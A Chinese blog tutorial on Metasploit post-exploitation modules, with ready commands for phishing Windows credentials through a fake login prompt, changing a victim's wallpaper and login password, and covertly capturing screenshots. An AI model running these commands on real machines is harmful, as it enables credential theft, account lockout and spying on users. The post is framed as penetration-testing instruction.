一旦受害者机器必须被者入侵,测试者可以使用msf后期利用模块来收集有关受害者的信息或证据。metasploit 框架中有478 个后期开发模块可用,在 post 模块的帮助下,让后期的测试会变得更有趣。
本文将为你介绍常用的几个post模块的使用,感兴趣就收藏吧!
如下,当我们成功得到系统的shell后,便可以建立有趣的post模块 了。
Windows凭据钓鱼
当我们无法得到系统管理员的密码时,可以利用此模块用于通过弹出登录提示框,对目标机器进行钓鱼。当受害者在登录提示中填写凭据时,凭据将发送给测试者。 要执行此,您需要执行以下命令。
use post/windows/gather/phish_windows_credentials
set session 1
run
效果如下所示:
当用户输入密码信息后
修改桌面壁纸
该模块将授予您更改受害机器桌面壁纸的权限。
在继续之前,我们必须有 PNG 或 JPEG 格式的图像。之后,我们需要执行这些命令,如下所示。
use post/multi/manage/set_wallpaper
set session 4
set wallpaper_file /home/shubham/Desktop/1.png
run
只要我们执行这个模块,受害者的桌面壁纸就会成功改变。
更改密码
本模块将帮助我们更改目标机器的窗口登录密码。
在 multi/handler
上执行这些给定的命令来执行测试。注意:要执行此操作,我们必须具有管理员权限。
use windows/manage/change_password
set session 4
set old_password 123456789
set new_password 12345678
set smbuser hp
run
修改后,用旧密码便无法成功登录系统。
Windows 屏幕收集
在这个模块中,测试者可以匿名获取受害者机器的桌面截图。
您需要在 multi/handler 上输入这些给定的命令。
use post/windows/gather/screen_spy
set session 10
set view_screenshots true
run
执行完后,我们会每5s得到一张桌面截图。
标签:use,set,run,session,模块,MSF,Post,好玩,post From: https://blog.51cto.com/dabiaoge/7230065